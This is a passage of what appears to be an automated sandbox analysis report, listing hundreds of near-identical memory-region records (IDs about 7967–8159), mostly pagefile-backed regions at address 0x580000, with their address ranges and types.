0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7967 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7970 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7971 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7972 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7973 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7974 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7975 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7976 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7977 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7978 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7979 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7980 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7981 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7982 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7983 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7984 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7985 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7986 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7987 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7988 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7989 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7990 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7991 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7992 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7993 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7994 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7995 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7996 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7997 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7998 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 7999 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8000 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8001 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8002 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8003 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8004 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8005 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8006 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8007 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8008 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8009 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8010 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8011 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8012 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8013 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8014 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8015 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8016 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8017 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8018 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8019 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8020 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8021 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8022 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8023 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8024 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8025 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8026 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8027 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8028 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8029 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8030 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8031 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8032 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8033 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8034 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8035 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8036 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8037 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8038 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8039 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8040 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8041 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8042 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8043 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8044 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8045 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8046 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8047 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8048 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8049 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8050 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8051 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8052 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8053 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8054 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8055 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8056 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8057 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8058 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8059 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8060 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8061 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8062 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8063 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8064 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8065 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8067 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8068 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8069 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8070 start_va = 0x590000 end_va = 0x592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 8071 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8072 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8073 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8074 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8075 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8076 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8077 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8078 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8079 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8080 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8081 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8082 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8083 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8084 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8085 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8086 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8087 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8088 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8089 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8090 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8091 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8092 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8093 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8094 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8095 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8096 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8097 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8098 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8099 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8100 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8101 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8102 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8103 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8106 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8107 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8108 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8109 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8110 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8111 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8112 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8113 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8114 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8115 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8116 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8117 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8118 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 8119 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8120 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8121 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8122 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8123 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8124 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8125 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8126 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8127 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8128 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8129 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8130 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8131 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8132 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8133 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8134 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8135 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8136 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8137 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8138 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8139 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8140 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8141 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8142 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8143 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8144 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8145 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8146 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8147 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8148 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8149 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8150 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8151 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8152 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8153 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8154 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8155 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8156 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8157 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8158 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8159 start_va = 0x580000 end_va = 